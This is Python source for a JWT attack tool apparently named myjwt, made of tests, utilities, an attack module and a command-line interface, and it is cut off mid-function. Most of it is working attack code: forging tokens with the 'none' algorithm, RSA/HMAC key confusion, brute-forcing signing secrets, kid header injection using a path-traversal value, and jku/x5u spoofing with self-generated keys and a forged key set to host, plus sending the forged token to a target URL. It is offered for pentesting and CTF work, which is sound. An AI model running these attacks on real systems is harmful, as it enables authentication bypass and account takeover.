"""Test"""
import os

import OpenSSL
import pytest

from myjwt.Exception import InvalidJWT
from myjwt.utils import create_crt
from myjwt.utils import HEADER
from myjwt.utils import jwt_to_json
from myjwt.utils import PAYLOAD
from myjwt.utils import SIGNATURE
from myjwt.vulnerabilities import bruteforce_wordlist
from myjwt.vulnerabilities import confusion_rsa_hmac
from myjwt.vulnerabilities import inject_sql_kid
from myjwt.vulnerabilities import jku_vulnerability
from myjwt.vulnerabilities import none_vulnerability
from myjwt.vulnerabilities import print_decoded
from myjwt.vulnerabilities import send_jwt_to_url
from myjwt.vulnerabilities import x5u_vulnerability

jwt = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJsb2dpbiI6ImEifQ.Fjziy6GSQpP9tQRyko5APZjdymkQ8EJGOa"
    "-A2JQ6xcAVucXRhZbdBbAM2DG8io_brP_ROAqYaNlvRVsztXoPHFz_e7D2K0q6f02RXeRwZJGOhy0K"
    "-Oj9Z1UmFJWqVpAAafN75w7OKoSRh6BtQfH8XDleqwpVoywCuWFdYrSbqBoVskRQkp8H-HUC5XmN5om4"
    "-NdiQkiKa7OFQ6Hoklclz9_WD5rc"
    "-HWJp3rJW4EIHzOPfs1GuDuhtIRu0uuRYp4vvzLZcVm0BhlK9e_fmFcbsTz3MwVHIeFEIx2NjQdhE"
    "-CefQ4tNg6Rr6OtgGExToUfD0i0mAoAhTcvmoyO6c2paQ"
)
jwt_bruteforce = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjpudWxsfQ"
    ".Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM"
)
jwt_kid = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6ImtleTEifQ.eyJ1c2VyIjpudWxsfQ"
    ".2B9ZKzJ3FeJ9yoNLDGKgcxOuo05PwDRzFQ_34CrGteQ"
)
jwt_jku = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MCJ9.eyJ1c2VyIjoiYSJ9"
    ".e1oZ73Q95aYPcRfulEY--beuGEV2tE1W_FGHtH1ZlevC76lBVqbdM5PY1v6quuJWRtNLwqDbUdydAH4lubgE0pwix-A7LqcD-b"
    "-0mNQkt9jXqBYCYBsZtGnvBFB9qHoK_CI39qLku1rOWkcEOcJYMSJFfxipImBb_AwoiXv"
    "-wmnpchTOAY_PFOtXVXKHkoGQtEaMKfnRBXHAgyEAcqHCqvljWuMmdKVpyGNVaQBnKCEKkGyYLpdpL2UIZ3XNYy96JcGpm6LHvIXm6r"
    "EOkWoJl2j_07xVsM2S__QzllRw_qezS5rzuYlRz-0j0nP_S5gSRcdrR4yNtSO3ivue5mR-RQ"
)
jwt_x5u = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dSI6Imh0dHA6Ly90ZXN0LmNvbSJ9.eyJ1c2VyIjoiaGFja2VyIn0.Z57BGf-BW"
    "WGCYGRST3PstC7dqFVxLpYh8D9iy6z8_tpz8vIESa5IdLt3hkM8ysB0IjrkWbgNMYTaP7YiGpHG7MhF_IAc_q8HOilMtvrVTyJ0EpE3uJ"
    "okXZSh_hhU5ay2K8H743AG_5x7coAf7ZsNe_rnSuDN6iV_oXo31H2ga9VMk2BLgvqFLYgIYVETeQbcSx4M2rxiH20VbqO4dwzYDedYkD"
    "AHKGHUAI0eXJoJ7Sq3sDrjZ9_THTiHSwQQYFnlIbIcFKuANdExuhG-tmIhfa6-8Zu_RELLL6UzgL2G-yu021B_Hm9YmwuXewtDktXKY"
    "uWofo-PVFUUWVSEw7gIAw"
)
key = "pentesterlab"
public_path = "./examples/05-rsa-hmac-confusion/public.pem"
password_path = "./wordlist/common_pass.txt"
signature = "KJDuTWSj9wa3NL3j1u2HOijvgu-oO9tBjKGxjo_qdXQ"
kid_injection = "../../../../../../dev/null"


def test_none_vulnerability():
    """
    Test none_vulnerability method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        none_vulnerability("")

    new_jwt = none_vulnerability(jwt)
    jwt_json = jwt_to_json(jwt)
    new_jwt_json = jwt_to_json(new_jwt)

    assert jwt_json[PAYLOAD] == new_jwt_json[PAYLOAD]
    assert new_jwt_json[HEADER]["alg"] == "none"
    assert new_jwt_json[SIGNATURE] == ""


def test_confusion_rsa_hmac():
    """
    Test confusion_rsa_hmac method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        confusion_rsa_hmac("", public_path)

    new_jwt = confusion_rsa_hmac(jwt, public_path)
    jwt_json = jwt_to_json(jwt)
    new_jwt_json = jwt_to_json(new_jwt)

    assert jwt_json[PAYLOAD] == new_jwt_json[PAYLOAD]
    assert new_jwt_json[HEADER]["alg"] == "HS256"
    assert new_jwt_json[SIGNATURE] == signature


def test_bruteforce_wordlist():
    """
    Test bruteforce_wordlist method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        bruteforce_wordlist("", password_path)

    new_key = bruteforce_wordlist(jwt_bruteforce, password_path)
    assert new_key == key

    new_key = bruteforce_wordlist(jwt_bruteforce, "./wordlist/empty.txt")
    assert new_key == ""


def test_inject_sql_kid():
    """
    Test inject_sql_kid method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        inject_sql_kid("", kid_injection)

    jwt = inject_sql_kid(jwt_kid, kid_injection)
    assert jwt_to_json(jwt)[HEADER]["kid"] == kid_injection


def test_print_decoded():
    """
    Test print_decoded method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        print_decoded("")
    print_decoded(jwt_bruteforce)


def test_send_jwt_to_url(requests_mock):
    """
    Test send_jwt_to_url method in vulnerabilities.py
    """
    status_code = 200
    requests_mock.get(
        "http://localhost:8080",
        json={},
        status_code=status_code,
    )

    response = send_jwt_to_url(
        "http://localhost:8080",
        "GET",
        {"data": "data"},
        {"cookie": "cookie"},
        "test",
    )
    assert response.request.method == "GET"
    assert response.request.json() == {"data": "data"}

    status_code = 200
    requests_mock.post(
        "http://localhost:8080",
        json={},
        status_code=status_code,
    )
    response = send_jwt_to_url(
        "http://localhost:8080",
        "POST",
        {"data": "data"},
        {"cookie": "cookie"},
        "test",
    )
    assert response.request.method == "POST"
    assert response.request.json() == {"data": "data"}
    assert response.request.headers["Authorization"] == "Bearer test"


def test_jku_vulnerability(requests_mock):
    """
    Test jku_vulnerability method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        jku_vulnerability("", "http://test.com")

    with pytest.raises(InvalidJWT):
        jku_vulnerability(jwt_bruteforce, "http://test.com")

    status_code = 200
    requests_mock.get(
        "http://localhost:8080",
        json={
            "keys": [
                {
                    "kty": "RSA",
                    "use": "sig",
                    "kid": "xxxxxxxxx",
                    "n": "oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
                    "-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
                    "ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
                    "XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
                    "e": "AQAB",
                    "alg": "RS256",
                },
            ],
        },
        status_code=status_code,
    )
    jwt = jku_vulnerability(jwt_jku, "http://test.com")
    jwt_json = jwt_to_json(jwt)
    assert "jku" in jwt_json[HEADER]
    assert os.path.exists("jwk-python.json")
    assert jwt_json[HEADER]["jku"] == "http://test.com/jwk-python.json"

    jwt = jku_vulnerability(jwt_jku, "http://test.com", file="test")
    jwt_json = jwt_to_json(jwt)
    assert "jku" in jwt_json[HEADER]
    assert os.path.exists("test.json")
    assert jwt_json[HEADER]["jku"] == "http://test.com/test.json"

    privatekey = OpenSSL.crypto.PKey()
    privatekey.generate_key(OpenSSL.crypto.TYPE_RSA, 4096)

    with open("private.pem", "w") as f:
        f.write(
            OpenSSL.crypto.dump_privatekey(
                OpenSSL.crypto.FILETYPE_PEM,
                privatekey,
            ).decode(),
        )

    jku_vulnerability(
        jwt_jku,
        "http://test.com",
        file="test",
        pem="private.pem",
    )
    assert os.path.exists("private.pem")


def test_x5u_vulnerability(requests_mock):
    """
    Test x5u_vulnerability method in vulnerabilities.py
    """
    with pytest.raises(InvalidJWT):
        x5u_vulnerability("", url="http://test.com")

    with pytest.raises(InvalidJWT):
        x5u_vulnerability(jwt_bruteforce, url="http://test.com")

    status_code = 200
    requests_mock.get(
        "http://test.com",
        json={
            "keys": [
                {
                    "kty": "RSA",
                    "use": "sig",
                    "kid": "xxxxxxxxx",
                    "n": "oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
                    "-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
                    "ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
                    "XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
                    "e": "AQAB",
                    "alg": "RS256",
                },
            ],
        },
        status_code=status_code,
    )
    jwt = x5u_vulnerability(
        jwt_x5u,
        url="http://test.com",
    )
    jwt_json = jwt_to_json(jwt)
    assert "x5u" in jwt_json[HEADER]
    assert os.path.exists("jwks_with_x5c.json")
    assert jwt_json[HEADER]["x5u"] == "http://test.com/jwks_with_x5c.json"
    create_crt()

    x5u_vulnerability(
        jwt_x5u,
        url="http://test.com",
        crt="selfsigned.crt",
        pem="private.pem",
    )
    assert os.path.exists("private.pem")
    assert os.path.exists("selfsigned.crt")

    jwt = x5u_vulnerability(
        jwt_x5u,
        url="http://test.com",
        file="test_x5u_vulnerability",
    )
    jwt_json = jwt_to_json(jwt)
    assert "x5u" in jwt_json[HEADER]
    assert os.path.exists("test_x5u_vulnerability.json")
    assert (
        jwt_json[HEADER]["x5u"]
        == "http://test.com/test_x5u_vulnerability.json"
    )



"""
Utils package
"""
import base64
import json
from typing import Dict

import click
import pyperclip
from OpenSSL import crypto

from myjwt.Exception import InvalidJWT
from myjwt.Exception import InvalidJwtJson
from myjwt.variables import CLIPBOARD

HEADER = "header"
PAYLOAD = "payload"
SIGNATURE = "signature"


def jwt_to_json(jwt: str) -> Dict:
    """
    Transform your jwt's string to a dict.

    Parameters
    ----------
    jwt: str
        your jwt.

    Returns
    -------
    Dict
        a dict with key: header with value base64_decode(header), payload with value base64_decode(payload), and signature with value signature.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_split = jwt.split(".")
    header = jwt_split[0]
    payload = jwt_split[1]
    signature = jwt_split[2]
    header_json = encoded_to_json(header)
    payload_json = encoded_to_json(payload)
    return {HEADER: header_json, PAYLOAD: payload_json, SIGNATURE: signature}


def encoded_to_json(encoded_string: str) -> Dict:
    """
    Transform your encoded string to dict.

    Parameters
    ----------
    encoded_string: str
        your string base64 encoded.

    Returns
    -------
    Dict
        your string cast to a dict.
    """
    decode = base64.b64decode(
        encoded_string + "=" * (-len(encoded_string) % 4),
    )
    return json.loads(decode)


def encode_jwt(jwt_json: Dict) -> str:
    """
    Transform your jwt dict to a jwt string without "." + signature.

    Parameters
    ----------
    jwt_json: Dict
        dict with key header and payload.

    Returns
    -------
    str
        jwt string encoded
    """
    if not is_valid_jwt_json(jwt_json):
        raise InvalidJwtJson("Invalid JWT json format")
    header_encoded = (
        base64.urlsafe_b64encode(
            json.dumps(jwt_json[HEADER], separators=(",", ":")).encode(
                "UTF-8",
            ),
        )
        .decode("UTF-8")
        .strip("=")
    )
    payload_encoded = (
        base64.urlsafe_b64encode(
            json.dumps(jwt_json[PAYLOAD], separators=(",", ":")).encode(
                "UTF-8",
            ),
        )
        .decode("UTF-8")
        .strip("=")
    )
    return header_encoded + "." + payload_encoded


def is_valid_jwt(jwt: str) -> bool:
    """
    Check your jwt.

    Parameters
    ----------
    jwt: str
        jwt string.

    Returns
    -------
    bool
        True if jwt is valid , False else
    """
    return len(jwt.split(".")) == 3


def is_valid_jwt_json(jwt_json: Dict) -> bool:
    """
    Check your jwt dict.

    Parameters
    ----------
    jwt_json: Dict
        your jwt dict.

    Returns
    -------
    bool
        True if jwt_json is valid , False else
    """
    return (
        HEADER in jwt_json
        and PAYLOAD in jwt_json
        and SIGNATURE in jwt_json
        and type(jwt_json[HEADER]) is dict
        and type(jwt_json[PAYLOAD]) is dict
        and type(jwt_json[SIGNATURE]) is str
    )


def create_crt():
    """
    Create crt + pem

    Returns
    -------
    str, str
        crt + pem
    """
    k = crypto.PKey()
    k.generate_key(crypto.TYPE_RSA, 2048)
    # create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().C = "AU"
    cert.get_subject().ST = "Victoria"
    cert.get_subject().L = "Melbourne"
    cert.get_subject().O = "myjwt"
    cert.get_subject().CN = "hacker"
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(k)
    cert.sign(k, "sha256")
    crt = "selfsigned.crt"
    pem = "private.pem"
    with open("selfsigned.crt", "wt") as f:
        f.write(
            crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode("utf-8"),
        )
        f.close()
    with open("private.pem", "wt") as f:
        f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode("utf-8"))
        f.close()
    return crt, pem


def copy_to_clipboard(jwt: str) -> None:
    """
    Copy txt to clipboard.

    Parameters
    ----------
    jwt: str
        your jwt.
    """
    try:
        pyperclip.copy(jwt)
        click.echo(CLIPBOARD)
    except pyperclip.PyperclipException:
        click.echo(
            """Pyperclip could not find a copy/paste mechanism for your system.
        For more information, please visit https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error""",
        )



"""
Exception package
"""


class InvalidJWT(Exception):
    """
    Invalid JWT
    """

    def __init__(self, message):
        self.message = message


class InvalidJwtJson(Exception):
    """
    Invalid InvalidJwtJson
    """

    def __init__(self, message):
        self.message = message


class InvalidParam(Exception):
    """
    Invalid Param
    """

    def __init__(self, message):
        self.message = message


class UnknownAlg(Exception):
    """
    UnknownAlg
    """

    def __init__(self, message):
        self.message = message



"""
All methods needed to try vulnerabilities on jwt
"""
import base64
import json
from typing import Dict

import click
import requests
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from OpenSSL import crypto

from myjwt.Exception import InvalidJWT
from myjwt.modify_jwt import change_alg
from myjwt.modify_jwt import signature
from myjwt.utils import create_crt
from myjwt.utils import encode_jwt
from myjwt.utils import HEADER
from myjwt.utils import is_valid_jwt
from myjwt.utils import jwt_to_json
from myjwt.utils import PAYLOAD
from myjwt.utils import SIGNATURE


def none_vulnerability(jwt: str) -> str:
    """
    Check none Vulnerability.

    Parameters
    ----------
    jwt: str
        your jwt string.

    Returns
    -------
    str
        your new jwt.

    Raises
    -------
    InvalidJWT
        if your jwt is not valid.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_json = change_alg(jwt_to_json(jwt), "none")
    return encode_jwt(jwt_json) + "."


def confusion_rsa_hmac(jwt: str, filename: str) -> str:
    """
    Check rsa/hmac confusion.

    Parameters
    ----------
    jwt: str
        your jwt string.
    filename: str
        path file of your public key.

    Returns
    -------
    str
        your new jwt.

    Raises
    -------
    InvalidJWT
        if your jwt is not valid.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_json = change_alg(jwt_to_json(jwt), "HS256")
    return signature(jwt_json, open(filename).read())


def bruteforce_wordlist(jwt: str, filename: str) -> str:
    """
    Crack your jwt with wordlist.

    Parameters
    ----------
    jwt: str
        your jwt string.
    filename: str
        path file of your wordlist txt file.

    Returns
    -------
    str
        your new jwt or "" if the valid key is not found.

    Raises
    -------
    InvalidJWT
        if your jwt is not valid.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_json = jwt_to_json(jwt)
    with open(filename, encoding="latin-1") as file:
        all_password = [line.rstrip() for line in file]
    file.close()
    for password in all_password:
        new_jwt = signature(jwt_json, password)
        new_signature = new_jwt.split(".")[2]
        if new_signature == jwt.split(".")[2]:
            return password
    return ""


def inject_sql_kid(jwt: str, injection: str) -> str:
    """
    Inject sql to your jwt.

    Parameters
    ----------
    jwt: str
        your jwt.
    injection: str
        your kid injection.

    Returns
    -------
    str
        your new jwt.

    Raises
    -------
    InvalidJWT
        if your jwt is not valid.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_json = jwt_to_json(jwt)
    jwt_json[HEADER]["kid"] = injection
    return signature(jwt_json, "")


def send_jwt_to_url(
    url: str,
    method: str,
    data: Dict,
    cookies: Dict,
    jwt: str,
) -> requests.Response:
    """

    Parameters
    ----------
    url: str
        your url.
    method: str
        method (GET, POST, etc.....).
    data: Dict
        json to send.
    cookies: Dict
        cookies to send.
    jwt: str
        your jwt.
    Returns
    -------
    requests.Response
        Response
    """
    if method == "POST":
        return requests.post(
            url,
            json=data,
            headers={"Authorization": "Bearer " + jwt},
            cookies=cookies,
        )

    return requests.request(method=method, url=url, json=data, cookies=cookies)


def print_decoded(jwt: str):
    """
    Print your jwt.

    Parameters
    ----------
    jwt: str
        your jwt.

    Returns
    -------
    None
        Print your jwt.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_json = jwt_to_json(jwt)
    click.echo("Header: ")
    for key in jwt_json[HEADER].keys():
        click.echo(
            str(key)
            + " = "
            + (
                str(jwt_json[HEADER][key])
                if jwt_json[HEADER][key] is not None
                else "null"
            ),
        )

    click.echo("")
    click.echo("Payload: ")
    for key in jwt_json[PAYLOAD].keys():
        click.echo(
            str(key)
            + " = "
            + (
                str(jwt_json[PAYLOAD][key])
                if jwt_json[PAYLOAD][key] is not None
                else "null"
            ),
        )
    click.echo("")
    click.echo("Signature: \n" + json.dumps(jwt_json[SIGNATURE]))


def jku_vulnerability(jwt=None, url=None, file=None, pem=None):
    """
    Check jku Vulnerability.

    Parameters
    ----------
    jwt: str
        your jwt.
    url: str
        your url.
    file: str
        your output json file name
    pem: str
       pem file name

    Returns
    -------
    str
        your new jwt.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwt_json = jwt_to_json(jwt)

    if "jku" not in jwt_json[HEADER]:
        raise InvalidJWT("Invalid JWT format JKU missing")

    if file is None:
        file = "jwk-python.json"
    jwks = requests.get(jwt_json[HEADER]["jku"]).json()

    jwt_json[HEADER]["alg"] = "RS256"
    if ".json" not in file:
        file += ".json"
    if not url.endswith("/"):
        url += "/"
    jwt_json[HEADER]["jku"] = f"{url}{file}"
    if pem is None:
        key = crypto.PKey()
        key.generate_key(type=crypto.TYPE_RSA, bits=2048)
    else:
        key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read())
    priv = key.to_cryptography_key()
    pub = priv.public_key()

    e = pub.public_numbers().e
    n = pub.public_numbers().n

    jwks["keys"][0]["e"] = (
        base64.urlsafe_b64encode(
            e.to_bytes(e.bit_length() // 8 + 1, byteorder="big"),
        )
        .decode("UTF-8")
        .rstrip("=")
    )
    jwks["keys"][0]["n"] = (
        base64.urlsafe_b64encode(
            n.to_bytes(n.bit_length() // 8 + 1, byteorder="big"),
        )
        .decode("UTF-8")
        .rstrip("=")
    )

    f = open(file, "w")
    f.write(json.dumps(jwks))
    f.close()

    s = encode_jwt(jwt_json)

    sign = priv.sign(
        bytes(s, encoding="UTF-8"),
        algorithm=hashes.SHA256(),
        padding=padding.PKCS1v15(),
    )

    return s + "." + base64.urlsafe_b64encode(sign).decode("UTF-8").rstrip("=")


def x5u_vulnerability(jwt=None, url=None, crt=None, pem=None, file=None):
    """
    Check jku Vulnerability.

    Parameters
    ----------
    jwt: str
        your jwt.
    url: str
        your url.
    crt: str
        crt path file
    pem: str
       pem file name
    file: str
        jwks file name

    Returns
    -------
    str
        your new jwt.
    """
    if not is_valid_jwt(jwt):
        raise InvalidJWT("Invalid JWT format")
    if file is None:
        file = "jwks_with_x5c.json"

    jwt_json = jwt_to_json(jwt)
    if "x5u" not in jwt_json[HEADER]:
        raise InvalidJWT("Invalid JWT format JKU missing")
    if crt is None or pem is None:
        crt, pem = create_crt()

    with open(crt) as f:
        content = f.read()
        f.close()

    x5u = requests.get(jwt_json[HEADER]["x5u"]).json()
    x5u["keys"][0]["x5c"] = (
        content.replace("-----END CERTIFICATE-----", "")
        .replace("-----BEGIN CERTIFICATE-----", "")
        .replace("\n", "")
    )
    if ".json" not in file:
        file += ".json"
    if not url.endswith("/"):
        url += "/"
    jwt_json[HEADER]["x5u"] = f"{url}{file}"

    f = open(file, "w")
    f.write(json.dumps(x5u))
    f.close()

    s = encode_jwt(jwt_json)
    key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read())

    priv = key.to_cryptography_key()
    sign = priv.sign(
        bytes(s, encoding="UTF-8"),
        algorithm=hashes.SHA256(),
        padding=padding.PKCS1v15(),
    )

    return s + "." + base64.urlsafe_b64encode(sign).decode("UTF-8").rstrip("=")



"""
Cli Package
"""
import json
import sys
from json import JSONDecodeError

import click
import exrex
import requests

from myjwt import __commit__
from myjwt import __version__
from myjwt.modify_jwt import add_header
from myjwt.modify_jwt import add_payload
from myjwt.modify_jwt import change_alg
from myjwt.modify_jwt import change_payload
from myjwt.modify_jwt import signature
from myjwt.user_interface import user_interface  # type: ignore
from myjwt.utils import copy_to_clipboard
from myjwt.utils import encode_jwt
from myjwt.utils import HEADER
from myjwt.utils import is_valid_jwt
from myjwt.utils import jwt_to_json
from myjwt.utils import SIGNATURE
from myjwt.variables import CHECK_DOCS
from myjwt.variables import CRACKED
from myjwt.variables import INVALID_SIGNATURE
from myjwt.variables import NEW_JWT
from myjwt.variables import NOT_CRAKED
from myjwt.variables import NOT_VALID_JWT
from myjwt.variables import VALID_COOKIES
from myjwt.variables import VALID_DATA
from myjwt.variables import VALID_HEADER
from myjwt.variables import VALID_PAYLOAD
from myjwt.variables import VALID_PAYLOAD_JSON
from myjwt.variables import VALID_SIGNATURE
from myjwt.vulnerabilities import bruteforce_wordlist
from myjwt.vulnerabilities import confusion_rsa_hmac
from myjwt.vulnerabilities import inject_sql_kid
from myjwt.vulnerabilities import jku_vulnerability
from myjwt.vulnerabilities import print_decoded
from myjwt.vulnerabilities import send_jwt_to_url
from myjwt.vulnerabilities import x5u_vulnerability

CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])


@click.command(context_settings=CONTEXT_SETTINGS)
@click.version_option(
    __version__,
    message=f"myjwt, version: {__version__}, commit: {__commit__}\nFull documentation: https://myjwt.readthedocs.io/",
)
@click.argument("jwt")
# modify your jwt
@click.option(
    "--full-payload",
    help="New payload for your jwt.Json format Required.",
)
@click.option(
    "--add-header",
    "-h",
    help="Add a new key, value to your jwt header, if key is present old value will be replaced.Format: key=value.",
    multiple=True,
)
@click.option(
    "--add-payload",
    "-p",
    help="Add a new key, value to your jwt payload, if key is present old value will be replaced.Format: key=value.",
    multiple=True,
)
# signature
@click.option("--sign", help="Sign Your jwt with key given.")
@click.option("--verify", help="verify your key.")
# vulnerabilities
@click.option(
    "--none-vulnerability",
    "-none",
    is_flag=True,
    help="Check None Alg vulnerability.",
)
@click.option(
    "--hmac",
    type=click.Path(exists=True),
    help="Check RS/HMAC Alg vulnerability.",
)
@click.option(
    "--bruteforce",
    type=click.Path(exists=True),
    help="Bruteforce to guess the secret used to sign the token.",
)
@click.option(
    "--crack",
    "-c",
    help="regex to iterate all string possibilities to guess the secret used to sign the token.",
)
@click.option("--kid", help="Kid Injection sql")
@click.option("--jku", help="Jku Header to bypass authentication")
@click.option("--x5u", help="X5u Header to bypass authentication")
@click.option("--crt", help="For x5cHeader, force crt file")
@click.option(
    "--key",
    help="For jku or x5c Header, force private key to your key file",
)
@click.option("--file", help="For jku Header and x5u Header, force file name")
# print
@click.option("--print", is_flag=True, help="Print Decoded JWT")
# url
@click.option("-u", "--url", help="Url to send your jwt.")
@click.option(
    "-m",
    "--method",
    help="Method use for send request to url.(Default GET).",
    default="GET",
)
@click.option(
    "-d",
    "--data",
    help="Data send to your url.Format: key=value. if value = MY_JWT value will be replace by new jwt.",
    multiple=True,
)
@click.option(
    "-c",
    "--cookies",
    help="Cookies to send to your url.Format: key=value. if value = MY_JWT value will be replace by new jwt.",
    multiple=True,
)
def myjwt_cli(jwt, **kwargs):
    """
    \b
    This cli is for pentesters, CTF players, or dev.
    You can modify your jwt, sign, inject ,etc...
    Full documentation is at http://myjwt.readthedocs.io.
    If you see problems or enhancement send an issue.I will respond as soon as possible.
    Enjoy :)
    All new jwt will be copy to the clipboard.
    \f

    Parameters
    ----------
    jwt: str
        your jwt
    kwargs: Dict
        all option value
    """
    if not is_valid_jwt(jwt):
        sys.exit(NOT_VALID_JWT)

    # detect if some options are here
    # if no option detected print user_interface
    interface_mode = True
    for option in kwargs.values():
        if not (
            option is None or option == () or not option or option == "GET"
        ):
            interface_mode = False
    if interface_mode:
        user_interface(jwt)
        sys.exit()

    if kwargs["bruteforce"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        key = bruteforce_wordlist(jwt, kwargs["bruteforce"])
        if key == "":
            sys.exit(NOT_CRAKED)
        else:
            copy_to_clipboard(key)
            click.echo(CRACKED + key)
            if (
                not kwargs["add_header"]
                and not kwargs["add_payload"]
                and not kwargs["full_payload"]
            ):
                sys.exit()

    if kwargs["add_payload"]:
        payload_dict = dict()
        for payload in kwargs["add_payload"]:
            new_str = payload.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_PAYLOAD)
            payload_dict[new_str[0]] = new_str[1]
        jwt_json = add_payload(jwt_to_json(jwt), payload_dict)
        jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

    if kwargs["add_header"]:
        header_dict = dict()
        for header in kwargs["add_header"]:
            new_str = header.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_HEADER)
            header_dict[new_str[0]] = new_str[1]
        jwt_json = add_header(jwt_to_json(jwt), header_dict)
        jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

    if kwargs["full_payload"]:
        try:
            jwt_json = change_payload(
                jwt_to_json(jwt),
                json.loads(kwargs["full_payload"]),
            )
            jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
        except JSONDecodeError:
            sys.exit(VALID_PAYLOAD_JSON)
    if kwargs["x5u"]:
        jwt = x5u_vulnerability(
            jwt,
            url=kwargs["x5u"],
            pem=kwargs["key"],
            crt=kwargs["crt"],
            file=kwargs["file"],
        )
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    if kwargs["jku"]:
        jwt = jku_vulnerability(
            jwt,
            kwargs["jku"],
            kwargs["file"],
            kwargs["key"],
        )
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
        click.echo(
            f"Please run python -m http.server --bind {kwargs['jku']} .Before send your jwt",
        )
    if kwargs["kid"]:
        jwt = inject_sql_kid(jwt, kwargs["kid"])
        if not kwargs["sign"]:
            copy_to_clipboard(jwt)
            click.echo(NEW_JWT + jwt)
    if kwargs["hmac"]:
        jwt = confusion_rsa_hmac(jwt, kwargs["hmac"])
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)

    if kwargs["none_vulnerability"]:
        jwt_json = change_alg(jwt_to_json(jwt), "none")
        jwt = encode_jwt(jwt_json) + "."
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    if kwargs["sign"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        jwt = signature(jwt_json, kwargs["sign"])
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    if kwargs["verify"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        new_jwt = signature(jwt_json, kwargs["verify"])
        click.echo(
            VALID_SIGNATURE
            if new_jwt.split(".")[2] == jwt.split(".")[2]
            else INVALID_SIGNATURE,
        )
    if kwargs["crack"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)

        all_string = list(exrex.generate(kwargs["crack"]))
        click.echo(
            kwargs["crack"]
            + " have "
            + str(len(all_string))
            + " possibilities",
        )
        with click.progressbar(
            all_string,
            label="Keys",
            length=len(all_string),
        ) as bar:
            for key in bar:
                new_jwt = signature(jwt_json, key)
                if new_jwt.split(".")[2] == jwt.split(".")[2]:
                    copy_to_clipboard(key)
                    sys.exit("Key found: " + key)
            sys.exit(INVALID_SIGNATURE)
    if kwargs["url"]:
        data_dict = dict()
        for d in kwargs["data"]:
            new_str = d.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_DATA)
            if new_str[1] == "MY_JWT":
                data_dict[new_str[0]] = jwt
            else:
